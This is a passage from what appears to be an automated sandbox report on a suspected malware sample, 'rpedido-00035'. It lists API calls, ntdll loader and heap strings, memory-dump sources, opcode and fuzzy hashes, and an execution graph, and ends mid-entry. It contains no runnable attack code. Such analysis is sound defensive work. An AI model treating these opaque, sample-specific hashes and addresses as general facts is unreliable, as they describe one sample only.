                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3370423016
                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                          • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

                                                          Execution Graph

                                                          Execution Coverage:0%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:23.7%
                                                          Total number of Nodes:139
                                                          Total number of Limit Nodes:0
                                                          execution_graph 48565 36006e00 RtlDebugPrintTimes RtlDebugPrintTimes 48566 36016e00 22 API calls 48567 360a3608 394 API calls 48568 3603d600 296 API calls 48683 36018009 253 API calls 48684 3605100e 258 API calls 48685 3600ec0b 271 API calls 48686 3600640d 398 API calls 48570 36009610 264 API calls 48687 3604dc14 264 API calls 48688 36012410 257 API calls 48689 36042c10 261 API calls 48572 3600821b 268 API calls 48573 3609b214 257 API calls 48574 3600b620 GetPEB RtlDebugPrintTimes GetPEB 48692 3600b420 9 API calls 48693 36012022 14 API calls 48576 3602fe2f LdrInitializeThunk RtlDebugPrintTimes 48578 36007a30 258 API calls 48695 360cc03d 264 API calls 48580 36012e32 264 API calls 48696 36040030 253 API calls 48582 36047a33 312 API calls 48585 360d124c 28 API calls 48586 3603ea40 275 API calls 48587 3604f240 258 API calls 48588 3600fa44 7 API calls 48593 3600b260 274 API calls 48698 36007060 RtlDebugPrintTimes 48699 3600dc60 258 API calls 48595 360c0e6d 79 API calls 48700 36013c60 12 API calls 48701 360b9060 20 API calls 48597 36017a6f RtlDebugPrintTimes GetPEB GetPEB 48598 360a327e 11 API calls 48599 3604ce70 25 API calls 48703 36016074 264 API calls 48604 3600ca84 256 API calls 48705 36007c85 260 API calls 48606 3600a290 384 API calls 48607 3600fe90 6 API calls 48707 3600c090 264 API calls 48609 36017290 14 API calls 48610 3602d690 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes 48611 36092e9f 292 API calls 48612 360d0ead GetPEB LdrInitializeThunk GetPEB GetPEB GetPEB 48614 360106a0 268 API calls 48708 360100a0 407 API calls 48616 3604cea0 296 API calls 48709 3600e0a4 267 API calls 48618 360522a0 344 API calls 48619 360082b0 255 API calls 48710 3600b0c0 310 API calls 48623 36013ec0 14 API calls 48625 360432c0 256 API calls 48711 36046cc0 260 API calls 48712 3609a4c1 LdrInitializeThunk 48713 3601fcc9 GetPEB GetPEB GetPEB RtlDebugPrintTimes 48626 360b86c2 GetPEB GetPEB GetPEB RtlDebugPrintTimes GetPEB 48627 
360ccedc 263 API calls 48714 36011cd0 259 API calls 48715 3603f4d0 266 API calls 48717 36038cdf 254 API calls 48718 360a3cd4 6 API calls 48628 360072e0 253 API calls 48630 360156e0 295 API calls 48631 360d02ec 10 API calls 48632 360366e0 316 API calls 48633 36013ee2 7 API calls 48634 36019ae4 267 API calls 48637 36030aeb 295 API calls 48638 360362e9 265 API calls 48722 360164f0 RtlDebugPrintTimes GetPEB 48723 3603acf0 13 API calls 48639 360496f0 259 API calls 48640 360462f0 292 API calls 48641 36018af4 GetPEB GetPEB RtlDebugPrintTimes 48726 360394fa 254 API calls 48642 360df6f6 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48643 360c36f7 258 API calls 48644 360202f9 260 API calls 48727 360a8d0a 257 API calls 48729 36040100 255 API calls 48645 3609330c 256 API calls 48646 36018b10 263 API calls 48647 3603cb10 GetPEB GetPEB GetPEB GetPEB 48648 360c9313 LdrInitializeThunk GetPEB RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48650 36006b20 272 API calls 48651 3608fb28 20 API calls 48733 36041527 257 API calls 48652 3604ab20 257 API calls 48653 3604cb20 14 API calls 48654 36048322 394 API calls 48736 36049d2c 283 API calls 48655 3600a740 303 API calls 48741 3602e547 277 API calls 48657 360ce347 23 API calls 48742 36048d4f 278 API calls 48658 3603ff50 391 API calls 48660 3604a350 309 API calls 48743 3604415f 256 API calls 48662 3600bf70 GetPEB LdrInitializeThunk 48746 3600c170 298 API calls 48663 36011f70 25 API calls 48664 3603af72 21 API calls 48747 36015570 296 API calls 48665 3603a370 93 API calls 48666 3608e372 258 API calls 48667 360c8770 254 API calls 48668 360b8f76 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48669 36011380 67 API calls 48670 360caf8d 91 API calls 48749 36049580 299 API calls 48750 3602fd85 11 API calls 48751 3600cd8a 256 API calls 48752 360ad586 126 API calls 48753 36016d91 GetPEB GetPEB GetPEB 48754 360d959f 7 API calls 48672 36049790 301 API calls 48561 36052b90 
LdrInitializeThunk 48673 36093f9f GetPEB RtlDebugPrintTimes 48756 36008196 GetPEB GetPEB 48757 360c0593 13 API calls 48759 36007da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 48760 360e15ba GetPEB GetPEB RtlDebugPrintTimes RtlDebugPrintTimes 48675 36048fbc 278 API calls 48676 3600e3c0 295 API calls 48677 3600bfc0 GetPEB GetPEB GetPEB GetPEB GetPEB 48678 36091fc9 421 API calls 48762 360081c0 GetPEB 48763 36011dc0 6 API calls 48764 3604c5c6 393 API calls 48765 360251c0 260 API calls 48680 36009fd0 254 API calls 48768 3600c1d0 254 API calls 48769 36029dd0 269 API calls 48772 360171f0 349 API calls 48682 36038ffb 255 API calls 48773 360ea1f0 8 API calls

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3 360534e0-360534ec LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                           • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d4dbf90a420777a47b7f5abfdd7113c9248f4d600fd68afc89eb0601385a0e39
                                                          • Instruction ID: 83212c6f086d19956c2fd3748906b31c57db104d71670bc73865ae2366c1c30f
                                                          • Opcode Fuzzy Hash: d4dbf90a420777a47b7f5abfdd7113c9248f4d600fd68afc89eb0601385a0e39
                                                          • Instruction Fuzzy Hash: FB90023160510406D54061594655706140587D0209F61C856A1414529DC7E5895575B3

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2 36052eb0-36052ebc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                           • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e460c5b4147f81360f920510c174fbd1a72f46f2c04cc6587843895eadd673f8
                                                          • Instruction ID: 645d8939edc0391038c5f68c6af994ddad910f8772ab04188e7619ef46c58497
                                                          • Opcode Fuzzy Hash: e460c5b4147f81360f920510c174fbd1a72f46f2c04cc6587843895eadd673f8
                                                          • Instruction Fuzzy Hash: 8B90023120140406D5406159495570B040587D030AF51C456A2154516DC67588557572

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 36052b90-36052b9c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                           • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 40b584266e42f2f8621a7bf7d9064f76d4c6dc3e36c99be175355a423e7fbed9
                                                          • Instruction ID: 809932fc17719608b3594c8a7ba4781903ffcd0a7cebf49e0d60134841a11a11
                                                          • Opcode Fuzzy Hash: 40b584266e42f2f8621a7bf7d9064f76d4c6dc3e36c99be175355a423e7fbed9
                                                          • Instruction Fuzzy Hash: 1190023120108806D5506159854574A040587D0309F55C856A5414619DC6E588957132

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 66b3a7bbe0936f9329721553057e90db1e89fbeefe8a2f485373db42c884988c
                                                          • Instruction ID: 58faec57f572c65699304765922dfbc9d406bd097d97a89c95d538e3b0177f05
                                                          • Opcode Fuzzy Hash: 66b3a7bbe0936f9329721553057e90db1e89fbeefe8a2f485373db42c884988c
                                                          • Instruction Fuzzy Hash: 1990023120100406D54065995549646040587E0309F51D456A6014516EC6B588957132

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $ $0
                                                          • API String ID: 3446177414-3352262554
                                                          • Opcode ID: eb62f5132ab146bda0f07e9fd2055bd26c2d60854ad3028ee9dbf61a96cd987e
                                                          • Instruction ID: 8310582bd910f7fd8034f72c817509a665397a6c4eb5222c32a80c7ce0e87e58
                                                          • Opcode Fuzzy Hash: eb62f5132ab146bda0f07e9fd2055bd26c2d60854ad3028ee9dbf61a96cd987e
                                                          • Instruction Fuzzy Hash: EE3223B1A083818FE750CF69C885B5BBBE5BF89344F00896EF5D987250D7B5D848CB52

                                                          Strings
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 360852D9
                                                          • Thread identifier, xrefs: 36085345
                                                          • Critical section debug info address, xrefs: 3608522A, 36085339
                                                          • 8, xrefs: 360850EE
                                                          • double initialized or corrupted critical section, xrefs: 36085313
                                                          • Critical section address, xrefs: 36085230, 360852C7, 3608533F
                                                          • Invalid debug info address of this critical section, xrefs: 360852C1
                                                          • Critical section address., xrefs: 3608530D
                                                          • Address of the debug info found in the active list., xrefs: 360852B9, 36085305
                                                          • corrupted critical section, xrefs: 360852CD
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36085215, 360852A1, 36085324
                                                          • undeleted critical section in freed memory, xrefs: 36085236
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 3608534E
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 360852ED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 6e7a532b2bfd39f97af5874cd1fd618d63da3a00aa8a24e11571d403c6b3a94a
                                                          • Instruction ID: d25b54d6383a3e489b8a597a2337a910787c0580a5babd8a15f283b34d2a00cb
                                                          • Opcode Fuzzy Hash: 6e7a532b2bfd39f97af5874cd1fd618d63da3a00aa8a24e11571d403c6b3a94a
                                                          • Instruction Fuzzy Hash: 758198B1900318AFEB51CF95C981B9EBFF5BB08314F2145A9E904B7650D776A944CFA0

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 3446177414-1700792311
                                                          • Opcode ID: 5cd7b34e0bdb0dee678f76a52a4fe2946c3bd56fc334940fbdf08bb06b28cd92
                                                          • Instruction ID: 666d1f370a84e8b82ad36bc8209759c2366a55b9341fe9262b45971707c15d83
                                                          • Opcode Fuzzy Hash: 5cd7b34e0bdb0dee678f76a52a4fe2946c3bd56fc334940fbdf08bb06b28cd92
                                                          • Instruction Fuzzy Hash: 16D1FC39900646DFEB02CFA8C942AADBFF2FF49304F0484C9E446AB252C736D981CB51

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: e4533953321ea0fbfa892306b5c2435821eca62bb429867d522d5de9a211aad6
                                                          • Instruction ID: 72da34597c1bae0e2ae6aab93c3cea57ccf2bf52c2bd962566f94174bc7a7624
                                                          • Opcode Fuzzy Hash: e4533953321ea0fbfa892306b5c2435821eca62bb429867d522d5de9a211aad6
                                                          • Instruction Fuzzy Hash: 7251E1B59043519BD721CF15CD82AABBBE8FF84354F40899DFA5983160E770D644CB92

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                          • API String ID: 3446177414-1745908468
                                                          • Opcode ID: 784cdd2cb3b13da34be01e351d09af4e6c0f5c9d0613a8e9545ce858ff05a26f
                                                          • Instruction ID: 027ecf6f4dfa49cd20d10598c329ac5a4a2acf4930f4b9503daa84b93fec532a
                                                          • Opcode Fuzzy Hash: 784cdd2cb3b13da34be01e351d09af4e6c0f5c9d0613a8e9545ce858ff05a26f
                                                          • Instruction Fuzzy Hash: BC91DC79900645DFEF02CFA9C842AADBFF2FF49714F148899E441AB251CB36D941CB52
                                                          APIs
                                                          • RtlDebugPrintTimes.NTDLL ref: 3600651C
                                                            • Part of subcall function 36006565: RtlDebugPrintTimes.NTDLL ref: 36006614
                                                            • Part of subcall function 36006565: RtlDebugPrintTimes.NTDLL ref: 3600665F
                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 360697B9
                                                          • LdrpInitShimEngine, xrefs: 36069783, 36069796, 360697BF
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3606977C
                                                          • apphelp.dll, xrefs: 36006446
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 360697A0, 360697C9
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36069790
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-204845295
                                                          • Opcode ID: 78c7245cc4f3d5a71cd053a5eaef7ea1475d9544b4a9161fda5ce0fe640931e5
                                                          • Instruction ID: 08abbb99d1203f7cf5a01629495c8ffdf90e585817ed2bcb30ede4d22cf75805
                                                          • Opcode Fuzzy Hash: 78c7245cc4f3d5a71cd053a5eaef7ea1475d9544b4a9161fda5ce0fe640931e5
                                                          • Instruction Fuzzy Hash: AC51DE716183019FE710CF21CD92A9FBBE9EF84348F40099AF684A7561DA31DA58CB93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                          • API String ID: 0-3532704233
                                                          APIs
                                                          • RtlDebugPrintTimes.NTDLL ref: 3603D879
                                                            • Part of subcall function 36014779: RtlDebugPrintTimes.NTDLL ref: 36014817
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-1975516107
                                                          Strings
                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3600D136
                                                          • @, xrefs: 3600D24F
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3600D263
                                                          • @, xrefs: 3600D2B3
                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3600D202
                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3600D0E6
                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3600D06F
                                                          • @, xrefs: 3600D09D
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                          • API String ID: 0-1356375266
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                          • API String ID: 0-2224505338
                                                          Strings
                                                          • VerifierDlls, xrefs: 3609893D
                                                          • VerifierFlags, xrefs: 360988D0
                                                          • HandleTraces, xrefs: 3609890F
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 360986E7
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 360986BD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 3609880F
                                                          • VerifierDebug, xrefs: 36098925
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          Strings
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3607A79F
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3607A7AF
                                                          • apphelp.dll, xrefs: 36032382
                                                          • LdrpDynamicShimModule, xrefs: 3607A7A5
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          Similarity
                                                          • API ID:
                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-122214566
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          Strings
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 36081FA9
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 36081FC9
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 36081F8A
                                                          • SXS: %s() passed the empty activation context, xrefs: 36081F6F
                                                          • RtlGetAssemblyStorageRoot, xrefs: 36081F6A, 36081FA4, 36081FC4
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 36081F82
                                                          Similarity
                                                          • API ID:
